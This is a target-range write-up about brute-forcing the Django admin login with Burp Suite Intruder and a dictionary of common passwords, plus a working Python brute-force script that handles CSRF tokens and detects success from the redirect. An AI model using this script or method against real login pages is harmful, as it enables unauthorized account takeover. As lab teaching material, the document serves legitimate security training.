This writeup mainly covers password brute-forcing ("blasting") of the Django admin login.
Django target range. Page title: Django: the Web framework for perfectionists with deadlines.
Task:
SQL injection exercise. Using the vulnerability django-cve_2019_14234, write a file named after your class name into the system. (CVE-2019-14234 is a SQL injection in the key and index lookups of Django's PostgreSQL JSONField and HStoreField, reachable through the admin changelist filters; it was fixed in Django 1.11.23, 2.1.11 and 2.2.4.)
1. Open the target range; the interface below appears.
The authenticate function (Django's authentication backend entry point) is used to authenticate existing users.
As the figure below shows, there is a user named admin.
2. User login
Login page title: Log in | Django site admin
On the login page, the known information is the username admin; the unknown is the password.
Brute-force with Burp Suite Pro.
2.1 Burp Suite brute force
Enable the local proxy listener on 127.0.0.1:8080.
Use the Firefox extension FoxyProxy to route browser traffic through that proxy.
Return to the target's login page with intercept on so Burp captures the login request.
Request captured by Burp Suite:
Right-click, Send to Intruder, then open the Positions tab.
Click Clear on the right to remove all payload markers, then mark only the password parameter. Attack type: Sniper.
On the Payloads tab I chose a dictionary attack. I downloaded a dictionary of 6,000 commonly used passwords; if you need it, please download it from the official website.
Click Load... and load the dictionary that was downloaded to the desktop.
Click Start attack in the upper right corner.
Sorting the results by Length shows one response that differs from all the others (a successful login redirects instead of re-rendering the form with an error); the password is a123123123.
Log in as admin with the recovered password (page: Log in | Django site admin).
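The Intruder run in step 2 can be reproduced as a script, which makes the two details Burp hides explicit: the request must carry a valid csrftoken cookie / csrfmiddlewaretoken pair, and success is detected by status code and response length (302 redirect versus a 200 re-render of the form). The block below is an added example written for this page; it is not code from the lab or from the Django project. Assumptions not taken from the page: the form is the stock Django admin login at /admin/login/ with the fields csrfmiddlewaretoken, username, password and next; a stale CSRF pair yields 403; the hostname target:8000 and the four-word list are constructed. FakeDjangoAdmin is a constructed stand-in so the script runs offline; swap in UrllibTransport() and a real URL to run it against the lab.

```python
"""Script version of the Burp Intruder Sniper run: brute-force the Django admin login.
Added example for this writeup, not the lab's or Django's own code."""
import http.cookiejar
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Iterable, List, Optional, Tuple

Response = Tuple[int, dict, str]  # (status, headers, body)
CSRF_INPUT = re.compile(r'name="csrfmiddlewaretoken"\s+value="([^"]+)"')


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow the 302: it is the success signal we want to see."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


class UrllibTransport:
    """Real HTTP client; the cookie jar keeps csrftoken and sessionid across posts."""
    def __init__(self) -> None:
        self.opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()), _NoRedirect())

    def get(self, url: str) -> Response:
        return self._send(urllib.request.Request(url))

    def post(self, url: str, data: dict, headers: dict) -> Response:
        body = urllib.parse.urlencode(data).encode()
        return self._send(urllib.request.Request(url, data=body, headers=headers))

    def _send(self, req: urllib.request.Request) -> Response:
        try:
            with self.opener.open(req) as r:
                return r.status, dict(r.headers), r.read().decode(errors="replace")
        except urllib.error.HTTPError as e:  # urllib raises on 3xx/4xx; that is data for us
            return e.code, dict(e.headers), e.read().decode(errors="replace")


class FakeDjangoAdmin:
    """Constructed offline stand-in for the lab's admin login (assumption, not a real server)."""
    def __init__(self, valid_password: str, rotate_at: Optional[int] = None) -> None:
        self.valid = valid_password
        self.rotate_at = rotate_at   # post number at which the token goes stale (None: never)
        self.token = "t0k3n"
        self.posts = 0

    def get(self, url: str) -> Response:
        return 200, {}, f'<input type="hidden" name="csrfmiddlewaretoken" value="{self.token}">'

    def post(self, url: str, data: dict, headers: dict) -> Response:
        self.posts += 1
        if self.posts == self.rotate_at:  # simulate the CSRF pair becoming invalid mid-run
            self.token += "x"
            return 403, {}, "Forbidden (CSRF token missing or incorrect.)"
        if data.get("csrfmiddlewaretoken") != self.token:
            return 403, {}, "Forbidden (CSRF token missing or incorrect.)"
        if data.get("username") == "admin" and data.get("password") == self.valid:
            return 302, {"Location": data.get("next", "/admin/")}, ""
        return 200, {}, '<p class="errornote">Please enter the correct username and password.</p>'


def fetch_csrf(transport, login_url: str) -> str:
    """GET the login page: Django sets the csrftoken cookie (kept by the transport) and
    embeds a matching csrfmiddlewaretoken that must be POSTed back with the form."""
    status, _, body = transport.get(login_url)
    m = CSRF_INPUT.search(body)
    if status != 200 or m is None:
        raise RuntimeError(f"no CSRF token on {login_url} (HTTP {status})")
    return m.group(1)


def login_succeeded(status: int, headers: dict, login_path: str = "/admin/login/") -> bool:
    """Good credentials: 302 to `next`. Bad ones: 200 with the form re-rendered.
    This is the status/length difference visible in the Intruder results table."""
    location = next((v for k, v in headers.items() if k.lower() == "location"), "")
    return status == 302 and login_path not in location


def brute_force(transport, login_url: str, username: str, wordlist: Iterable[str],
                next_url: str = "/admin/") -> Tuple[Optional[str], List[Tuple[str, int, int]]]:
    """Try each password; return (found password or None, [(password, status, length)])."""
    token = fetch_csrf(transport, login_url)  # one token reused, as Intruder replays the request
    headers = {"Referer": login_url, "Content-Type": "application/x-www-form-urlencoded"}
    results: List[Tuple[str, int, int]] = []
    for password in wordlist:
        form = {"csrfmiddlewaretoken": token, "username": username,
                "password": password, "next": next_url}
        status, resp_headers, body = transport.post(login_url, form, headers)
        if status == 403:  # CSRF pair went stale: refresh the token once and retry this word
            form["csrfmiddlewaretoken"] = token = fetch_csrf(transport, login_url)
            status, resp_headers, body = transport.post(login_url, form, headers)
        results.append((password, status, len(body)))
        if login_succeeded(status, resp_headers):
            return password, results
    return None, results


if __name__ == "__main__":
    # Offline demo against the constructed stand-in (constructed host and word list).
    fake = FakeDjangoAdmin("a123123123", rotate_at=2)
    found, table = brute_force(fake, "http://target:8000/admin/login/", "admin",
                               ["123456", "password", "admin123", "a123123123"])
    for row in table:
        print("%-12s status=%d length=%d" % row)
    print("password:", found)
```

Two points the script makes that the Burp screenshots do not: the captured csrfmiddlewaretoken can be replayed for the whole run because Django only checks that the form token and the csrftoken cookie share the same secret, so Intruder's single captured request keeps working until the cookie changes; and nothing slows the attack down, because the stock Django admin has no lockout or rate limiting (that needs an add-on such as django-axes or a reverse-proxy rule), which is exactly why a 6,000-word dictionary finishes in minutes.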
3. Add user information
Add user
Add user information
Added successfully